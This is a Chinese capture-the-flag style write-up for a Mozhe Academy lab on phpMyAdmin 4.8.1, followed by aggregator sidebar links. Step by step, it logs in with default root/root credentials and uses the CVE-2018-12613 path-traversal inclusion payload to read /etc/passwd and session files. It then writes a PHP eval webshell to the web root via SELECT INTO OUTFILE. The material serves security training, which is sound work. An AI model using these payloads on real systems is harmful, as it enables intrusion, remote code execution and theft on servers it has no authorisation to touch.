当前位置:网站首页>墨者学院-phpMyAdmin后台文件包含分析溯源
墨者学院-phpMyAdmin后台文件包含分析溯源
2022-07-04 07:40:00 【Lyswbb】
首先拿到题目到点击访问
访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器
账户密码:root root
点击sql模块 对sql语句进行一个查询
首先查询sql写一句话的权限
我们可以看到他的值为空
secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。
show global VARIABLES like '%secure%'
继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/
show VARIABLES like 'datadir'
接下来确认一下mysql权限,可以看到这里是最高权限root
SELECT USER();
权限和绝对路径都有了之后可以直接写入一句话了,先试一下phpinfo
select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';
当写进去之后访问失败,想了半天才发现这是mysql的路径,不是网站的绝对路径
继续想办法搞到网站的绝对路径 根据题目可知是通过文件包含的方式写一个phpinfo,通过泄漏的绝对路径来shell,思路有了,直接干
首先确定下数据库版本,该版本为4.8.1。在根据数据库版本历史漏洞查询关于文件包含的编号是CVE-2018-12613
直接利用payload进行包含就行了
http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
先写入一个phpinfo进数据库
select '<?php phpinfo();?>';
再通过文件包含去调用phpinfo
首先获取session的值,在构造参数去访问phpinfo,获取绝对路径
http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]
有了绝对路径之后就可以写入webshell了,写入之后直接访问1.php
select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";
使用管理工具登陆上去后到根下面直接去找key.txt 或者 find / -name key.txt
边栏推荐
- User login function: simple but difficult
- "Sword finger offer" 2nd Edition - force button brush question
- Handwritten easy version flexible JS and source code analysis
- 手写简易版flexible.js以及源码分析
- Implementation of ZABBIX agent active mode
- Activiti common operation data table relationship
- Is l1-029 too fat (5 points)
- Zhanrui tankbang | jointly build, cooperate and win-win zhanrui core ecology
- 节点基础~节点操作
- Pangu open source: multi support and promotion, the wave of chip industry
猜你喜欢
The frost peel off the purple dragon scale, and the xiariba people will talk about database SQL optimization and the principle of indexing (primary / secondary / clustered / non clustered)
Amd RX 7000 Series graphics card product line exposure: two generations of core and process mix and match
How to use MOS tube to realize the anti reverse connection circuit of power supply
A real penetration test
L2-013 red alarm (C language) and relevant knowledge of parallel search
Detailed introduction to the big changes of Xcode 14
Technical experts from large factories: common thinking models in architecture design
SQL foundation 9 [grouping data]
Introduction to sap commerce cloud B2B organization function
The idea of implementing charts chart view in all swiftui versions (1.0-4.0) was born
随机推荐
两年前美国芯片扭捏着不卖芯片,如今芯片堆积如山祈求中国帮忙
Mysql database - function constraint multi table query transaction
2022-021ARTS:下半年开始
This monitoring system can monitor the turnover intention and fishing all, and the product page has 404 after the dispute appears
Is l1-029 too fat (5 points)
输入年份、月份,确定天数
时序数据库 InfluxDB 2.2 初探
MySQL 数据库 - 函数 约束 多表查询 事务
Xcode 14之大变化详细介绍
L1-024 the day after tomorrow (5 points)
在所有SwiftUI版本(1.0-4.0)中原生实现Charts图表视图之思路
User login function: simple but difficult
L1-027 rental (20 points)
How to reset IntelliSense in vs Code- How to reset intellisense in VS Code?
Routing decorator of tornado project
Introduction to rce in attack and defense world
Recursive Fusion and Deformable Spatiotemporal Attention for Video Compression Artifact Reduction
Zhanrui tankbang | jointly build, cooperate and win-win zhanrui core ecology
[real case] how to deal with the failure of message consumption?
The text box displays the word (prompt text) by default, and the text disappears after clicking.